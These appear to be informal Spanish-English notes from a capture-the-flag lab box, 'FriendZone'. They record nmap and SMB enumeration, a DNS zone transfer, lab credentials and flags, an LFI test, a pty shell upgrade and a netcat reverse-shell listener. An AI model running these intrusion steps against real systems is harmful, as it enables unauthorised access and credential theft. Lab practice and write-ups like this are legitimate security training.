ip = 10.10.10.123

nmap -p- -sV -sC 10.10.10.123 --open

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -39m51s, deviation: 1h09m16s, median: 7s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2020-03-11T19:00:43+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-11T17:00:43
|_  start_date: N/A


gobuster dir -u http://10.10.10.123/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

searchsploit UnrealIRCd

vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) = no funciono metasploit

/index.html (Status: 200)
/wordpress (Status: 301)
/robots.txt (Status: 200)

smbclient -L 10.10.10.123

Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	Files           Disk      FriendZone Samba Server Files /etc/Files
	general         Disk      FriendZone Samba Server Files
	Development     Disk      FriendZone Samba Server Files
	IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))

smbclient //10.10.10.123/general = el doble // sirve para que toco lo que copie hay se vaya al directorio donde estoy parado

creds.txt                           N       57  Tue Oct  9 18:52:42 2018

get creds.txt

creds for the admin THING:

admin:WORKWORKHhallelujah@#

steghide extract -sf fz.jpg

dig axfr friendzone.red @10.10.10.123

https://www.welivesecurity.com/la-es/2015/06/17/trata-ataque-transferencia-zona-dns/

admin.friendzoneportal.red. 604800 IN	A	127.0.0.1
friendzoneportal.red
friendzone.red
files.friendzoneportal.red. 604800 IN	A	127.0.0.1
imports.friendzoneportal.red. 604800 IN	A	127.0.0.1
vpn.friendzoneportal.red. 604800 IN	A	127.0.0.1
hr.friendzone.red.	604800	IN	A	127.0.0.1
uploads.friendzone.red.	604800	IN	A	127.0.0.1
administrator1.friendzone.red. 604800 IN A	127.0.0.1


------------------------------------------------------------ SEGUNSO INTENTO ----------------------------------------------

smbmap -H 10.10.10.123

Testing some functions !

I'am trying not to break things !
dUpuZmwxcGcyWTE1ODM5NTU1NzFqTHlmWTdJelE5 = conversion base64 y el resultado es uJnfl1pg2Y1583955571jLyfY7IzQ9

dig axfr @10.10.10.123 friendzone.red

admin.friendzoneportal.red. 604800 IN	A	127.0.0.1
files.friendzoneportal.red. 604800 IN	A	127.0.0.1
imports.friendzoneportal.red. 604800 IN	A	127.0.0.1
vpn.friendzoneportal.red. 604800 IN	A	127.0.0.1
hr.friendzone.red.	604800	IN	A	127.0.0.1
uploads.friendzone.red.	604800	IN	A	127.0.0.1
administrator1.friendzone.red. 604800 IN A	127.0.0.1

LFI = File inclusion vulnerability

USER FLAG = a9ed20acecd6c5b6b52f474e15ae9a11
ROOT FLAG = b0e6c60b82cf96e9855ac1656a9e90c7

db_user=friend

db_pass=Agpyu12!0.213$

$ python -c 'import pty;pty.spawn("/bin/bash")'

podemos crear un archivo php que solo imprima un echo y luego en la variable pagename podemos pasarle esto:
=/etc/Development/echo.php o =/etc/Development/echo
con esto nos damos cuenta si tiene  una vulnerabilidad LFI

el /opt es como la carpeta file and programs en windows

10.1.1. Módulo os

El módulo os nos permite acceder a funcionalidades dependientes del Sistema Operativo. Sobre todo, aquellas que nos refieren información sobre el entorno del mismo y nos permiten manipular la estructura de directorios (para leer y escribir archivos, ver capítulo 9). Referencia oficial.

Python nos permite trabajar en dos niveles diferentes con respecto al sistema de archivos y directorios. Uno de ellos, es a través del módulo os, que como su nombre lo indica, nos facilita el trabajo con todo el sistema de archivos y directorios, a nivel del propios Sistema Operativo. El segundo nivel -más simple-, es el que nos permite trabajar con archivos, manipulando su lectura y escritura a nivel de la aplicación y tratando a cada archivo como un objeto.

nc -lvnp 9001

